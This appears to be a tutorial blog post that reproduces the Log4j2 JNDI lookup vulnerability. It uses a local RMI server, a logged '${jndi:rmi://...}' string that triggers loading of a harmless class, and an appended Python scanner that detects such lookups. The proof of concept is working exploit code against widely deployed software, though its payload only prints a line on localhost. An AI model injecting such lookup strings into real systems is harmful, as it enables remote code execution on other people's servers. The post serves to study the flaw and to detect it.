Background

Log4j2 recently had a very serious vulnerability disclosed; details can also be found here.

Test

Build the simplest possible Java application and add the Log4j2 dependency (every version before 2.15.0 is affected).
```xml
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
  <modelVersion>4.0.0</modelVersion>
  <groupId>name.chengchao</groupId>
  <artifactId>log4jtest</artifactId>
  <version>0.0.1-SNAPSHOT</version>
  <dependencies>
    <dependency>
      <groupId>org.apache.logging.log4j</groupId>
      <artifactId>log4j-api</artifactId>
      <version>2.14.1</version>
    </dependency>
    <dependency>
      <groupId>org.apache.logging.log4j</groupId>
      <artifactId>log4j-core</artifactId>
      <version>2.14.1</version>
    </dependency>
  </dependencies>
</project>
```
Since this vulnerability stems mainly from the lookup feature, the following demonstrates a JNDI lookup over RMI.

First, build an RMI service and register it on the local machine.
```java
package log4jtest;

import java.io.Serializable;
import java.rmi.Remote;

public class TimeServer implements Remote, Serializable {
    private static final long serialVersionUID = 1L;

    static {
        System.out.println("!!!TimeServer static invoked!!!");
    }
}
```
```java
package log4jtest;

import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

public class RMIServer {
    public static void main(String[] args) throws Exception {
        TimeServer timeserver = new TimeServer();
        Registry registry = LocateRegistry.createRegistry(1099);
        registry.bind("time", timeserver);
        System.out.println("Timeserver registry");
        Thread.sleep(1000000);
    }
}
```
This starts an RMI service on the local machine, listening on the default port 1099.

Testing the effect from application code is very simple.
```java
package log4jtest;

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class Log4jTest {
    public static void main(String[] args) throws Exception {
        Logger logger = LogManager.getLogger();
        String name = "${jndi:rmi://127.0.0.1:1099/time}";
        logger.error("hello:{}", name);
        Thread.sleep(10000);
    }
}
```
- Start RMIServer
- Run log4jtest.Log4jTest.main
- You can then see that TimeServer's code is loaded locally and executed
```text
!!!TimeServer static invoked!!!
10:22:56.343 [main] ERROR log4jtest.Log4jTest - hello:log4jtest.TimeServer@6bb4dd34
```
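The defender-side counterpart to the test above, as an added example that is not part of the original post: a small scanner that finds Log4j2-style `${prefix:value}` lookups in raw text handed to a logger and flags those with the `jndi` prefix, parsing out the scheme, host, port and bound name (for the post's string, `rmi`, `127.0.0.1`, `1099` and `/time`). The sample lines are constructed for this example.

```python
import re

# A Log4j2 lookup is written ${prefix:value}; the post's test string is
# ${jndi:rmi://127.0.0.1:1099/time}. Only the "jndi" prefix is flagged here.
LOOKUP_RE = re.compile(r"^\s*([A-Za-z0-9_-]+)\s*:(.*)$", re.DOTALL)
URL_RE = re.compile(r"^([a-z][a-z0-9+.-]*)://([^/:?#]+)(?::(\d+))?(/.*)?$", re.I)


def extract_lookups(text):
    """Return every outermost, brace-balanced ${...} token in text."""
    tokens, depth, start, i = [], 0, -1, 0
    while i < len(text):
        if text.startswith("${", i):
            if depth == 0:
                start = i
            depth, i = depth + 1, i + 2
            continue
        if text[i] == "}" and depth > 0:
            depth -= 1
            if depth == 0:
                tokens.append(text[start:i + 1])
        i += 1
    return tokens


def find_jndi_lookups(line):
    """Flag jndi lookups in one line and parse the target they name."""
    findings = []
    for tok in extract_lookups(line):
        m = LOOKUP_RE.match(tok[2:-1])
        if not m or m.group(1).lower() != "jndi":
            continue  # other lookups such as ${date:HH:mm:ss} pass through
        u = URL_RE.match(m.group(2).strip())
        findings.append({
            "raw": tok,
            "scheme": u.group(1).lower() if u else None,   # rmi, ldap, ...
            "host": u.group(2) if u else None,
            "port": int(u.group(3)) if u and u.group(3) else None,
            "name": u.group(4) if u else None,             # bound name, e.g. /time
        })
    return findings


def scan(lines):
    """Map 1-based line number to its jndi findings, omitting clean lines."""
    return {n: f for n, l in enumerate(lines, 1) if (f := find_jndi_lookups(l))}


# Constructed sample input: raw messages as handed to Log4j before any lookup ran.
SAMPLE_LINES = ["hello:${jndi:rmi://127.0.0.1:1099/time}",    # the post's test string
                "started at ${date:HH:mm:ss}", "hello:world"]  # benign lookup, no lookup

if __name__ == "__main__":
    print(scan(SAMPLE_LINES))
```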